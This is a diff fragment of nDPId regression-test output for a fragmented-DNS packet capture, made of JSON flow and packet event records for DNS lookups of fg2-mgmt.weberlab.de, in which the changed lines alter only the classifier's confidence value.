00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1559042371783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042371783,"pkt":"CFsOoYNeAAwpfKTLht1gCrtxAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTuhIANQBFzxq5yAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACJyfIZPEos+4"} -00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1559042371794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042371794,"pkt":"AAwpfKTLCFsOoYNeht1gDo22APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW6EgD2hIi5yIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYnJ8hk8Siz7hkUeklXO0ZQ\/LRIFOjEc9n"} -00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1559042372779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042372779,"pkt":"CFsOoYNeAAwpfKTLht1gBVO1AEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTgzgANQBFzxq9qQEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACOxvEogaB96P"} -00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1559042372791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042372791,"pkt":"AAwpfKTLCFsOoYNeht1gDjr2APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADWDOAD2QdK9qYUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAY7G8SiBoH3o+7l8juXO0ZRLEjB1nyQ3R8"} -00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1559042373843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042373843,"pkt":"CFsOoYNeAAwpfKTLht1gAgwqAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtOwANQBFzxrdhAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACKUAwuOvHQbi"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1559042373854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042373854,"pkt":"AAwpfKTLCFsOoYNeht1gCMIUAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW07AD2Jy7dhIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMyCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMxwFLAaQAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwE4AHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BpAAEAAQAADhAABMEY4+7ATgABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYpQDC468dBuIqFazGXO0ZRcWgFHZl7TCh"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1559042374827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042374827,"pkt":"CFsOoYNeAAwpfKTLht1gAgVFAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtWgANQBFzxrqAgEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACLUmUKpHzEhG"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1559042374838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042374838,"pkt":"AAwpfKTLCFsOoYNeht1gBQOmAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW1aAD2vA3qAoUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYtSZQqkfMSEY\/2z8HXO0ZRm3ax03ipZX3"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 